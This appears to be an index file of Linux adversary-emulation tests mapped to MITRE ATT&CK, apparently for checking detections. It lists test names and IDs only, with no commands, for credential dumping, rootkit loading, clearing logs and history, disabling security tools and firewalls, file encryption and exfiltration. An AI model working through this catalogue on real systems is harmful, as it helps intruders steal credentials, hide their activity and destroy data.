credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,OS Credential Dumping: /etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
discovery,T1087.001,Account Discovery: Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
discovery,T1040,Network Sniffing,9,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
discovery,T1040,Network Sniffing,10,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
discovery,T1040,Network Sniffing,11,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
discovery,T1082,System Information Discovery,24,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
discovery,T1201,Password Policy Discovery,4,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
discovery,T1614.001,System Location Discovery: System Language Discovery,3,Discover System Language with locale,837d609b-845e-4519-90ce-edc3b4b0e138,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
execution,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,bash
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
3 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
4 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
5 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
6 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
7 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
8 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
9 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
10 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
11 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
12 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
13 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
14 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
15 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
16 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
17 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
18 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
19 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
20 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
21 defense-evasion T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
22 defense-evasion T1036.005 Masquerading: Match Legitimate Name or Location 1 Execute a process from a directory masquerading as the current parent directory. 812c3ab8-94b0-4698-a9bf-9420af23ce24 sh
23 defense-evasion T1497.001 Virtualization/Sandbox Evasion: System Checks 1 Detect Virtualization Environment (Linux) dfbd1a21-540d-4574-9731-e852bd6fe840 sh
24 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
25 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 13 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
26 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 14 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
27 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 15 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
28 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
29 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
30 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
31 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
32 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
33 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
34 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
35 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
36 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
37 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
38 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
39 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
40 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
41 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
42 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
43 defense-evasion T1562 Impair Defenses 2 Disable journal logging via systemctl utility c3a377f9-1203-4454-aa35-9d391d34768f sh
44 defense-evasion T1562 Impair Defenses 3 Disable journal logging via sed utility 12e5551c-8d5c-408e-b3e4-63f53b03379f sh
45 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 2 Copy and Delete Mailbox Data on Linux 25e2be0e-96f7-4417-bd16-a4a2500e3802 bash
46 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 5 Copy and Modify Mailbox Data on Linux 6d99f93c-da56-49e3-b195-163090ace4f6 bash
47 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
48 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
49 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
50 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
51 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
52 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
53 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
54 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
55 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
56 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
57 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
58 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
59 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
60 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 Disable iptables 7784c64e-ed0b-4b65-bf63-c86db229fd56 sh
61 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 Modify/delete iptables firewall rules 899a7fb5-d197-4951-8614-f19ac4a73ad4 sh
62 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
63 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
64 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
65 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
66 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
67 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
68 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
69 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
70 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
71 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
72 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
73 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
74 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
75 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
76 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
77 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
78 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 3 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
79 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 4 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
80 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 5 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
81 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 6 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
82 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 7 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
83 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
84 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
85 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
86 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
87 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 38 Clear History 23b88394-091b-4968-a42d-fb8076992443 sh
88 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 39 Suspend History 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4 sh
89 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 40 Reboot Linux Host via Kernel System Request 6d6d3154-1a52-4d1a-9d51-92ab8148b32e sh
90 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 41 Clear Pagging Cache f790927b-ea85-4a16-b7b2-7eb44176a510 sh
91 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 42 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
92 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
93 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
94 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
95 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
96 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
97 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
98 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
99 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 1 Delete a single file - Linux/macOS 562d737f-2fc6-4b09-8c2a-7f8ff0828480 sh
100 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 2 Delete an entire folder - Linux/macOS a415f17e-ce8d-4ce2-a8b4-83b674e7017e sh
101 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 3 Overwrite and delete a file with shred 039b4b10-2900-404b-b67f-4b6d49aa6499 sh
102 defense-evasion T1070.004 Indicator Removal on Host: File Deletion 8 Delete Filesystem - Linux f3aa95fe-4f10-4485-ad26-abf22a764c52 bash
103 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 1 Binary simply packed by UPX (linux) 11c46cd8-e471-450e-acb8-52a1216ae6a4 sh
104 defense-evasion T1027.002 Obfuscated Files or Information: Software Packing 2 Binary packed by UPX, with modified headers (linux) f06197f8-ff46-48c2-a0c6-afc1b50665e1 sh
105 defense-evasion T1036.006 Masquerading: Space after Filename 2 Space After Filename b95ce2eb-a093-4cd8-938d-5258cef656ea bash
